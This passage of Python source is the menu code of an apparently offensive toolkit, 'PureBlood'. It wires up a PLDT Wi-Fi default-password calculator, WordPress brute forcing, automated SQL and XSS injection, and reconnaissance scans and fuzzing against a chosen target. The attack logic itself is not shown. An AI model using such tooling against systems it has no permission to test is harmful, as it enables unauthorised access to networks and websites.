            text = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
        gpassword_generator1, gpassword_generator2, gpassword_generator3 = cgenerator.password_generator(length, text)
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        print ('Random Password: ' + gpassword_generator1)
        print ('MD5: ' + gpassword_generator2)
        print ('L33T: ' + gpassword_generator3)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        generator()
    elif choice == 3:
        if sys.version_info[0] == 3:
            print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
            digit5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
            print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
            mac5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
            digit5 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
            print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
            mac5 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
        gpldt_password_calculator1, gpldt_password_calculator2, gpldt_password_calculator3, gpldt_password_calculator4, gpldt_password_calculator5 = cgenerator.pldt_password_calculator(digit5, mac5)
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        print ('[#] - Possible Password of the PLDT WIFI:')
        print ('\nFOR : PLDTHOMEDSL, PLDTmyDSLPAL, and PLDTmyDSLBiz')
        for i in gpldt_password_calculator1:
            print (' > ' + i)
        print ('\nFOR : PLDTHOMEDSLxxxxx')
        for i in gpldt_password_calculator2:
            print (' > ' + i)
        print ('\nFOR : PLDTHOMEFIBR_xxxxxx')
        print (' > ' + gpldt_password_calculator3)
        print ('\nFOR : PLDTHOMEFIBRxxxxxx')
        for i in gpldt_password_calculator4:
            print (' > ' + i)
        print ('\nFOR : HomeBro_Ultera')
        print (' > ' + gpldt_password_calculator5)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        generator()
    elif choice == 4:
        if sys.version_info[0] == 3:
            text = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            text = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
        gtext_to_hash = cgenerator.text_to_hash(text)
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        print (gtext_to_hash)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        generator()
    elif choice == 90:
        main()
    elif choice == 99:
        print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
        sys.exit()
    else:
        print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
        time.sleep(2)
        print ('')
        generator()



def web_application_attack():
    global cweb_application_atttack
    print ("""{3}[ {5}Web Application Attack {3}]

{2}01{3}) {5}Wordpress
{2}02{3}) {5}SQL Injection
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
    if sys.version_info[0] == 3:
        try:
            choice = int(input('{0}PureBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        except ValueError:
            print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
            time.sleep(2)
            print ('')
            web_application_attack()
    elif sys.version_info[0] == 2:
        try:
            choice = int(raw_input('{0}PureBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        except ValueError:
            print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
            time.sleep(2)
            print ('')
            web_application_attack()
    cweb_application_atttack = WebApplicationAttack()
    if choice == 1:
        print ("""{3}[ {5}Web Application Attack {3}]

{2}01{3}) {5}WPScan (Kali Linux) - Install manually on other OS
{2}02{3}) {5}WPScan Bruteforce (Kali Linux) - Install manually on other OS
{2}03{3}) {5}Wordpress Plugins Vulnerability Checker
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
        if sys.version_info[0] == 3:
            try:
                choice1 = int(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
            except KeyboardInterrupt:
                print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
                sys.exit()
            except ValueError:
                print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
                time.sleep(2)
                print ('')
                web_application_attack()
        elif sys.version_info[0] == 2:
            try:
                choice1 = int(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
            except KeyboardInterrupt:
                print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
                sys.exit()
            except ValueError:
                print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
                time.sleep(2)
                print ('')
                web_application_attack()
        if choice1 == 1:
            print ('{0}='.format(red) * int(sizex))
            print (reset + bold)
            try:
                wap_wp_scan = cweb_application_atttack.wp_scan(url)
            except NameError:
                print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
                time.sleep(2)
                web_application_attack()
            except KeyboardInterrupt:
                print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
                sys.exit()
            print (reset)
            print ('{0}='.format(red) * int(sizex))
            web_application_attack()
        elif choice1 == 2:
            print ('{0}='.format(red) * int(sizex))
            print (reset + bold)
            try:
                wap_wp_scan_bruteforce = cweb_application_atttack.wp_scan_bruteforce(url)
            except NameError:
                print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
                time.sleep(2)
                web_application_attack()
            except KeyboardInterrupt:
                print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
                sys.exit()
            print (reset)
            print ('{0}='.format(red) * int(sizex))
            print ('')
            web_application_attack()
        elif choice1 == 3: # Exploit-DB.com
            print ('{0}='.format(red) * int(sizex))
            print (reset + bold)
            try:
                wap_wordpress_plugin_checker = cweb_application_atttack.wordpress_vulnerability_check(url)
            except NameError:
                print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
                time.sleep(2)
                web_application_attack()
            except KeyboardInterrupt:
                print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
                sys.exit()
            print (reset)
            print ('{0}='.format(red) * int(sizex))
            print ('')
            web_application_attack()
        elif choice1 == 90:
            main()
        elif choice1 == 95:
            print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
            if sys.version_info[0] == 3:
                target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
            if sys.version_info[0] == 2:
                target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
            set_target(target, 2)
        elif choice1 == 99:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        else:
            print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
            time.sleep(2)
            print ('')
            web_application_attack()
    elif choice == 2:
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        try:
            wap_auto_sql_injection = cweb_application_atttack.auto_sql_injection(url)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            print ('')
            web_application_attack()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        print ('')
        web_application_attack()
    elif choice == 3:
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        try:
            wap_auto_xss_injection = cweb_application_atttack.wap_auto_xss_injection(url)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            print ('')
            web_application_attack()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        print ('')
        web_application_attack()
    elif choice == 90:
        main()
    elif choice == 95:
        print ('')
        print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
        if sys.version_info[0] == 3:
            target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
        print ('')
        set_target(target, 2)
    elif choice == 99:
        print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
        sys.exit()
    else:
        print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
        time.sleep(2)
        print ('')
        web_application_attack()



def web_pentest():
    global web_pentest_output
    global web_pentest_outputfile
    print ("""{3}[ {5}Web Pentest {3}]

{2}01{3}) {5}Banner Grab
{2}02{3}) {5}Whois
{2}03{3}) {5}Traceroute
{2}04{3}) {5}DNS Record
{2}05{3}) {5}Reverse DNS Lookup
{2}06{3}) {5}Zone Transfer Lookup
{2}07{3}) {5}Port Scan
{2}08{3}) {5}Admin Panel Scan
{2}09{3}) {5}Subdomain Scan
{2}10{3}) {5}CMS Identify
{2}11{3}) {5}Reverse IP Lookup
{2}12{3}) {5}Subnet Lookup
{2}13{3}) {5}Extract Page Links
{2}14{3}) {5}Directory Fuzz
{2}15{3}) {5}File Fuzz
{2}16{3}) {5}Shodan Search
{2}17{3}) {5}Shodan Host Lookup
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
    if sys.version_info[0] == 3:
        try:
            choice = int(input('{0}PureBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
        except KeyboardInterrupt:
            try:
                print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
            except:
                pass
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        except ValueError:
            print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
            time.sleep(2)
            print ('')
            web_pentest()
    elif sys.version_info[0] == 2:
        try:
            choice = int(raw_input('{0}PureBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
        except KeyboardInterrupt:
            try:
                print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
            except:
                pass
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        except ValueError:
            print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
            time.sleep(2)
            print ('')
            web_pentest()
    cweb_pentest = WebPentest()
    if choice == 1:
        try:
            wp_banner_grab = cweb_pentest.banner_grab(url)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Banner Grab Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        print (wp_banner_grab)
        web_pentest_outputfile.write('\n' + wp_banner_grab)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 2:
        try:
            wp_whois = cweb_pentest.whois(url)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Whois Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        print (wp_whois)
        web_pentest_outputfile.write('\n' + str(wp_whois))
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 3:
        try:
            wp_traceroute = cweb_pentest.traceroute(hostname)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Traceroute Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        print (wp_traceroute)
        web_pentest_outputfile.write('\n' + wp_traceroute)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 4:
        try:
            wp_dns_record = cweb_pentest.dns_record(hostname)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] DNS Record Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        web_pentest_outputfile.write('\n')
        for i in wp_dns_record:
            print (i)
            web_pentest_outputfile.write(str(i) + '\n')
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 5:
        try:
            wp_reverse_dns_lookup = cweb_pentest.reverse_dns_lookup(ip)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Reverse DNS Lookup Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        print (wp_reverse_dns_lookup)
        web_pentest_outputfile.write('\n' + wp_reverse_dns_lookup)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 6:
        try:
            wp_zone_transfer_lookup = cweb_pentest.zone_transfer_lookup(hostname)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Zone Transfer Lookup Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        print (wp_zone_transfer_lookup)
        web_pentest_outputfile.write('\n' + wp_zone_transfer_lookup)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 7:
        if sys.version_info[0] == 3:
            port_end = int(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            port_end = int(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
        try:
            wp_port_scan = cweb_pentest.port_scan(hostname, port_end)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Port Scan Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        web_pentest_outputfile.write('\n')
        for i in wp_port_scan:
            print (i)
            web_pentest_outputfile.write(str(i) + '\n')
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 8:
        try:
            wp_admin_panel_scan = cweb_pentest.admin_panel_scan(url)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Admin Panel Scan Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        web_pentest_outputfile.write('\n')
        for i in wp_admin_panel_scan:
            print (i)
            web_pentest_outputfile.write(str(i) + '\n')
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 9:
        if sys.version_info[0] == 3:
            subdomain_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            subdomain_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
        try:
            wp_subdomain_scan = cweb_pentest.subdomain_scan(hostname, subdomain_list)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        so_200, so_301, so_302, so_403 = wp_subdomain_scan
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Subdomain Scan Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        web_pentest_outputfile.write('\n')
        for i in so_200:
            print ('[+] 200 - ' + i)
            web_pentest_outputfile.write('[+] 200 - ' + i + '\n')
        for i in so_301:
            print ('[!] 301 - ' + i)
            web_pentest_outputfile.write('[+] 301 - ' + i + '\n')
        for i in so_302:
            print ('[!] 302 - ' + i)
            web_pentest_outputfile.write('[+] 302 - ' + i + '\n')
        for i in so_403:
            print ('[!] 403 - ' + i)
            web_pentest_outputfile.write('[+] 403 - ' + i + '\n')
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 10:
        try:
            wp_cms_detect = cweb_pentest.cms_detect(hostname)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] CMS Detect - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        print (wp_cms_detect)
        web_pentest_outputfile.write('\n' + wp_cms_detect)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 11:
        try:
            wp_reverse_ip_lookup = cweb_pentest.reverse_ip_lookup(hostname)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Reverse IP Lookup Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        print (wp_reverse_ip_lookup)
        web_pentest_outputfile.write('\n' + wp_reverse_ip_lookup)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 12:
        if sys.version_info[0] == 3:
            subnet_input = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            subnet_input = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
        try:
            wp_subnet_lookup = cweb_pentest.subnet_lookup(subnet_input)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        print (reset + bold)
        print (wp_subnet_lookup)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest()
    elif choice == 13:
        try:
            wp_links_extract = cweb_pentest.links_extract(url)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Links Extract Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        print (wp_links_extract)
        web_pentest_outputfile.write('\n' + wp_links_extract)
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 14:
        if sys.version_info[0] == 3:
            directory_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            directory_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
        try:
            wp_directory_fuzz1, wp_directory_fuzz2, wp_directory_fuzz3 = cweb_pentest.directory_fuzz(url, directory_list)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] Directory Fuzz Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('Response 200:\n')
        print ('[+] Response 200')
        for i in wp_directory_fuzz1:
            print (i)
            web_pentest_outputfile.write(i + '\n')
        web_pentest_outputfile.write('Response 301 / 302:\n')
        print ('[+] Response 301 / 302')
        for i in wp_directory_fuzz2:
            print (i)
            web_pentest_outputfile.write(i + '\n')
        web_pentest_outputfile.write('[+] Response 403:\n')
        print ('[+] Response 403')
        for i in wp_directory_fuzz3:
            print (i)
            web_pentest_outputfile.write(i + '\n')
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 15:
        if sys.version_info[0] == 3:
            file_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
        if sys.version_info[0] == 2:
            file_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
        try:
            wp_file_fuzz1, wp_file_fuzz2, wp_file_fuzz3 = cweb_pentest.file_fuzz(url, file_list)
        except NameError:
            print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
            time.sleep(2)
            web_pentest()
        except KeyboardInterrupt:
            print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
            sys.exit()
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('[+] File Fuzz Result - ' + url)
        web_pentest_outputfile.write('\n============================================================')
        print (reset + bold)
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('Response 200:\n')
        print ('[+] Response 200')
        for i in wp_file_fuzz1:
            print (i)
            web_pentest_outputfile.write(i + '\n')
        web_pentest_outputfile.write('Response 301 / 302:\n')
        print ('[+] Response 301 / 302')
        for i in wp_file_fuzz2:
            print (i)
            web_pentest_outputfile.write(i + '\n')
        web_pentest_outputfile.write('Response 403:\n')
        print ('[+] Response 403')
        for i in wp_file_fuzz3:
            print (i)
            web_pentest_outputfile.write(i + '\n')
        print (reset)
        print ('{0}='.format(red) * int(sizex))
        web_pentest_outputfile.write('\n')
        web_pentest_outputfile.write('============================================================\n')
        web_pentest()
    elif choice == 16:
        if sys.version_info[0] == 3:
            shodan_search_query = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
            SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
            shodan_search_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
            if '.txt' not in shodan_search_output_filename:
                shodan_search_output_filename = shodan_search_output_filename + '.txt'
            else:
                shodan_search_output_filename = shodan_search_output_filename
        if sys.version_info[0] == 2:
            # Python 2: use raw_input() for every prompt; input() would eval() the typed text.
